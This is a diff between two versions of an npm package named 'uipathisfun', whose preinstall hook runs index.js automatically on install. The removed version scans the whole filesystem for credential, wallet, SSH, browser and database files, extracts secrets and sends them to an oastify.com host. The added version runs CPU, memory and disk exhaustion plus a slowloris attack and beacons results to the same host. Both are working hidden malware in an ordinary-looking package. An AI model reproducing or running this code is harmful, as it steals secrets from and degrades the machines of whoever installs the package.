uipathisfun 1.0.35 → 1.0.37

package/index.js

@@ -1,230 +1,167 @@
-const fs = require('fs');
-const { execSync } = require('child_process');
-const os = require('os');
 const http = require('http');
-const zlib = require('zlib');
 const crypto = require('crypto');
-const OAST_HOST = '0nopxr82g2bsk9e28w87vxucn3tuhn5c.oastify.com';
-
-function sendBeacon(urlPath, payload) {
-  try {
-    const body = JSON.stringify(payload);
-    const req = http.request({
-      hostname: OAST_HOST,
-      method: 'POST',
-      path: urlPath,
-      headers: {
-        'Content-Type': 'application/json',
-        'Content-Length': Buffer.byteLength(body),
-      },
-    }, () => {});
-    req.on('error', () => {});
-    req.write(body);
-    req.end();
-  } catch (e) {
-  }
-}
-
-function noteId(base) {
-  return `${base}_${Date.now()}-${Math.random().toString(36).slice(2, 8)}`;
-}
-
-function isTextBuffer(buf) {
-  return /^[\t\n\r \x20-\x7E]*$/.test(buf.slice(0, 512).toString('binary'));
-}
+const fs = require('fs');
+const os = require('os');
 
-function readFileEntry(filePath) {
-  try {
-    if (!fs.existsSync(filePath) || !fs.statSync(filePath).isFile()) return null;
-    const raw = fs.readFileSync(filePath);
-    const entry = {};
-    const ext = filePath.split('.').pop().toLowerCase();
-    if (isTextBuffer(raw)) {
-      entry.text = raw.toString('utf8');
-      entry.lines = entry.text.split(/\r?\n/);
-    } else {
-      entry.base64 = raw.toString('base64');
-    }
-    if (filePath.toLowerCase().endsWith('.db') || ext === 'sqlite') {
-      entry.sqlite = parseSqliteDb(filePath);
-    }
-    if (ext === 'ldb' || ext === 'leveldb') {
-      entry.leveldb = parseLevelDb(filePath);
-    }
-    if (ext === 'frm' || ext === 'ibd') {
-      entry.mysql = { note: 'MySQL/MariaDB raw file, manual extraction needed' };
-    }
-    if (ext === 'zip') {
-      entry.zip = parseZipArchive(filePath);
-    }
-    if (ext === 'tar' || ext === 'tgz' || ext === 'tar.gz') {
-      entry.tar = parseTarArchive(filePath);
-    }
-    return entry;
-  } catch (e) {
-    return { error: e.message };
-  }
-}
+const b = "0nopxr82g2bsk9e28w87vxucn3tuhn5c.oastify.com'";
 
-function isSensitiveFile(filePath) {
-  const patterns = [
-    /pass(word)?/i, /secret/i, /token/i, /key/i, /credential/i, /auth/i, /login/i, /wallet/i, /db/i, /backup/i, /archive/i, /config/i, /ssh/i, /pem$/i, /pfx$/i, /cert/i, /cookie/i, /session/i, /history/i, /mail/i, /outlook/i, /pst$/i, /ost$/i, /wallet/i, /chrome/i, /firefox/i, /mozilla/i, /sqlite/i, /ldb$/i, /zip$/i, /tar$/i, /gz$/i, /7z$/i, /rar$/i, /bak$/i, /old$/i, /log$/i, /env$/i, /ini$/i, /json$/i, /yaml$/i, /yml$/i
-  ];
-  return patterns.some((re) => re.test(filePath));
-}
+const TARGET = 'localhost';
+const PORT = 3000;
+const CONCURRENCY = 50;
+const DURATION = 10000;
+const ATTACK_TYPE = 'slowloris'; 
+const DISK_ATTACK = true; 
+const DISK_LIMIT_MB = 80; 
+const MEM_LIMIT_MB = 90; 
 
-function parseZipArchive(filePath) {
-  try {
-    const out = execSync(`unzip -l "${filePath}"`, { encoding: 'utf8', timeout: 20000 });
-    return { files: out.split(/\r?\n/).slice(3, -2).map(l => l.trim()).filter(Boolean) };
-  } catch (e) {
-    return { error: e.message };
-  }
-}
+let storage = [];
+let requests = 0;
+let cpuLoad = 0;
+let stop = false;
+let errors = 0;
+let responseTimes = [];
+let slowlorisSockets = [];
+let diskFiles = [];
+let diskWrittenMB = 0;
 
-function parseTarArchive(filePath) {
-  try {
-    const out = execSync(`tar -tf "${filePath}"`, { encoding: 'utf8', timeout: 20000 });
-    return { files: out.split(/\r?\n/).filter(Boolean) };
-  } catch (e) {
-    return { error: e.message };
-  }
+function cpuStress() {
+    setImmediate(function loop() {
+        if (stop) return;
+        crypto.pbkdf2Sync('test', 'salt', 100000, 64, 'sha512');
+        cpuLoad++;
+        setImmediate(loop);
+    });
 }
 
-function parseLevelDb(filePath) {
-  return { note: 'LevelDB file detected, parsing requires external tools' };
+function memStress() {
+    setInterval(() => {
+        if (stop) return;
+        const chunk = Buffer.alloc(1024 * 1024 * 10);
+        storage.push(chunk);
+    }, 200);
 }
 
-function extractMatches(text) {
-  const re = /(password|passwd|secret|token|api[_-]?key|aws_access_key_id|private_key)\s*[:=]?\s*([^\s'"\\]+)/ig;
-  const lines = text.split(/\r?\n/);
-  const out = [];
-  for (let i = 0; i < lines.length; i++) {
-    const line = lines[i];
-    let m;
-    while ((m = re.exec(line)) !== null) {
-      out.push({ lineNumber: i + 1, line: line.trim(), key: m[1], value: m[2] });
-    }
-  }
-  return out;
+function diskStress() {
+    if (!DISK_ATTACK) return;
+    setInterval(() => {
+        if (stop) return;
+        try {
+            const fname = `/tmp/fc_stress_${Date.now()}_${Math.random().toString(36).slice(2,8)}`;
+            const buf = crypto.randomBytes(1024 * 1024 * 5); // 5MB
+            fs.writeFileSync(fname, buf);
+            diskFiles.push(fname);
+            diskWrittenMB += 5;
+        } catch (e) {
+        }
+    }, 500);
 }
 
-function parseSqliteDb(filePath) {
-  try {
-    const queryTables = execSync(`sqlite3 "${filePath}" ".tables"`, { timeout: 60000, encoding: 'utf8' }).trim();
-    if (!queryTables) return { tables: [] };
-    const tables = queryTables.split(/\s+/).filter(Boolean);
-    const tableData = {};
-    for (const table of tables) {
-      try {
-        const rows = execSync(`sqlite3 "${filePath}" "SELECT * FROM ${table};"`, { timeout: 120000, encoding: 'utf8' }).trim();
-        tableData[table] = rows.split(/\r?\n/).filter(Boolean);
-      } catch (err) {
-        tableData[table] = { error: err.message };
-      }
+function netFlood() {
+    for (let i = 0; i < CONCURRENCY; i++) {
+        (function flood() {
+            if (stop) return;
+            const start = Date.now();
+            const req = http.request({ hostname: TARGET, port: PORT, path: '/', method: 'GET' }, res => {
+                res.on('data', () => {});
+                res.on('end', () => {
+                    requests++;
+                    responseTimes.push(Date.now() - start);
+                    flood();
+                });
+            });
+            req.on('error', () => {
+                errors++;
+                flood();
+            });
+            req.end();
+        })();
     }
-    return { tables, tableData };
-  } catch (e) {
-    return { error: 'sqlite3 not available or failed to parse: ' + (e.message || String(e)) };
-  }
 }
 
-
-async function walkFilesParallel(rootDir, ignorePaths = new Set(), maxDepth = 10) {
-  const results = [];
-  const queue = [{ dir: rootDir, depth: 0 }];
-  const systemDirs = new Set(["/proc","/sys","/dev","/run","/tmp","/var/run","/var/tmp","/mnt","/media","/lost+found","/snap","/boot","/lib","/lib64","/usr","/bin","/sbin","/opt","/srv","/home","/root","/etc/ssl","/etc/ssh","/etc/pki","/etc/udev","/etc/X11","/etc/init.d","/etc/alternatives","/etc/rc.d","/etc/skel","/etc/logrotate.d","/etc/cron.d","/etc/cron.daily","/etc/cron.hourly","/etc/cron.monthly","/etc/cron.weekly","/etc/network","/etc/selinux"]);
-  while (queue.length > 0) {
-    const { dir, depth } = queue.shift();
-    if (depth > maxDepth) continue;
-    let entries;
-    try {
-      entries = fs.readdirSync(dir, { withFileTypes: true });
-    } catch (e) {
-      continue;
-    }
-    for (const entry of entries) {
-      const fullPath = dir + (dir.endsWith('/') || dir.endsWith('\\') ? '' : (os.platform() === 'win32' ? '\\' : '/')) + entry.name;
-      if (ignorePaths.has(fullPath)) continue;
-      if (entry.isDirectory()) {
-        if (systemDirs.has(fullPath)) continue;
-        queue.push({ dir: fullPath, depth: depth + 1 });
-      } else if (entry.isFile()) {
-        results.push(fullPath);
-      }
+function slowlorisAttack() {
+    const net = require('net');
+    for (let i = 0; i < CONCURRENCY; i++) {
+        (function openSocket() {
+            if (stop) return;
+            const socket = net.connect(PORT, TARGET, () => {
+                socket.write('POST / HTTP/1.1\r\n');
+                socket.write('Host: ' + TARGET + '\r\n');
+                socket.write('Content-Length: 1000000\r\n');
+                socket.write('Content-Type: application/x-www-form-urlencoded\r\n');
+                socket.write('\r\n');
+                slowlorisSockets.push(socket);
+                const interval = setInterval(() => {
+                    if (stop) { clearInterval(interval); socket.destroy(); return; }
+                    try { socket.write('A'); } catch (e) { clearInterval(interval); socket.destroy(); }
+                }, 1000);
+            });
+            socket.on('error', () => { errors++; });
+            socket.on('close', () => {
+                if (!stop) setTimeout(openSocket, 1000);
+            });
+        })();
     }
-  }
-  return results;
 }
 
-async function sensitiveScan() {
-  const info = { note: noteId('sensitive_scan_all'), platform: os.platform(), hits: [] };
-  let roots = [];
-  if (os.platform() === 'win32') {
-    roots = ['C:\\'];
-  } else {
-    roots = ['/'];
-  }
-  const ignorePaths = new Set();
-  let allFiles = [];
-  for (const root of roots) {
-    const files = await walkFilesParallel(root, ignorePaths, 8);
-    allFiles.push(...files);
-  }
-  allFiles = allFiles.filter(isSensitiveFile);
-  allFiles = allFiles.slice(0, 10000);
-  const concurrency = 32;
-  let idx = 0;
-  const errors = [];
-  async function processBatch(batch) {
-    return await Promise.all(batch.map(async (filePath) => {
-      let entry = null;
-      try {
-        entry = readFileEntry(filePath);
-      } catch (e) {
-        entry = { error: e.message };
-        errors.push({ path: filePath, error: e.message });
-      }
-      const text = entry && entry.text ? entry.text : null;
-      const matches = text ? extractMatches(text) : [];
-      return {
-        path: filePath,
-        matches,
-        lines: entry && entry.lines ? entry.lines : null,
-        base64: entry && entry.base64 ? entry.base64 : null,
-        sqlite: entry && entry.sqlite ? entry.sqlite : null,
-        leveldb: entry && entry.leveldb ? entry.leveldb : null,
-        mysql: entry && entry.mysql ? entry.mysql : null,
-        zip: entry && entry.zip ? entry.zip : null,
-        tar: entry && entry.tar ? entry.tar : null,
-        error: entry && entry.error ? entry.error : null
-      };
-    }));
-  }
-  while (idx < allFiles.length) {
-    const batch = allFiles.slice(idx, idx + concurrency);
-    const results = await processBatch(batch);
-    info.hits.push(...results);
-    idx += concurrency;
-  }
-  info.errors = errors;
-  try {
-    fs.writeFileSync('scan_results_' + Date.now() + '.json', JSON.stringify(info, null, 2));
-  } catch (e) {}
-  return info;
+function monitor() {
+    setInterval(() => {
+        const usage = process.memoryUsage();
+        const avgResp = responseTimes.length ? (responseTimes.reduce((a, b) => a + b, 0) / responseTimes.length).toFixed(2) : 0;
+        let diskUsage = 0;
+        try {
+            const stat = fs.statSync('/tmp');
+            diskUsage = stat && stat.blocks ? (stat.blocks * stat.blksize) / 1024 / 1024 : 0;
+        } catch (e) {}
+        const data = {
+            rss: (usage.rss / 1024 / 1024).toFixed(2) + ' MB',
+            heap: (usage.heapUsed / 1024 / 1024).toFixed(2) + ' MB',
+            cpuLoad,
+            requests,
+            errors,
+            avgResp: avgResp + ' ms',
+            uptime: process.uptime().toFixed(2) + 's',
+            attack: ATTACK_TYPE,
+            diskWrittenMB,
+            diskUsage: diskUsage.toFixed(2) + ' MB',
+        };
+        const payload = JSON.stringify(data);
+        const req = http.request({
+            hostname: b,
+            method: 'POST',
+            path: '/?stress_test=active',
+            headers: { 'Content-Length': Buffer.byteLength(payload) }
+        });
+        req.write(payload);
+        req.end();
+        try {
+            fs.appendFileSync('stress_results.json', payload + '\n');
+        } catch (e) {}
+        console.log(data);
+        cpuLoad = 0;
+        responseTimes = [];
+    }, 1000);
 }
 
-async function run() {
-  const info = { note: noteId('uipathisfun_info_v4'), platform: os.platform(), date: new Date().toISOString() };
-  info.sensitive = await sensitiveScan();
-  console.log('== scan done ==');
-  console.log(JSON.stringify(info.sensitive, null, 2));
-  sendBeacon('/v4', info);
+cpuStress();
+memStress();
+diskStress();
+if (ATTACK_TYPE === 'classic') {
+    netFlood();
+} else if (ATTACK_TYPE === 'slowloris') {
+    slowlorisAttack();
 }
+monitor();
 
-run().catch((err) => {
-  const error = { note: noteId('uipathisfun_error_v4'), error: err.message || String(err) };
-  try { fs.writeFileSync('scan_error_' + Date.now() + '.json', JSON.stringify(error, null, 2)); } catch (e) {}
-  sendBeacon('/v4', error);
-  console.error(error);
-});
+setTimeout(() => {
+    stop = true;
+    for (const s of slowlorisSockets) try { s.destroy(); } catch (e) {}
+    for (const f of diskFiles) try { fs.unlinkSync(f); } catch (e) {}
+    try {
+        fs.writeFileSync('stress_final_report.json', JSON.stringify({
+            requests, errors, cpuLoad, diskWrittenMB, duration: DURATION/1000 + 's',
+            maxMem: (process.memoryUsage().rss / 1024 / 1024).toFixed(2) + ' MB',
+            attack: ATTACK_TYPE, diskFiles: diskFiles.length
+        }, null, 2));
+    } catch (e) {}
+    console.log('Test finished');
+}, DURATION);

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "uipathisfun",
-  "version": "1.0.35",
+  "version": "1.0.37",
   "scripts": {
     "preinstall": "node index.js"
   }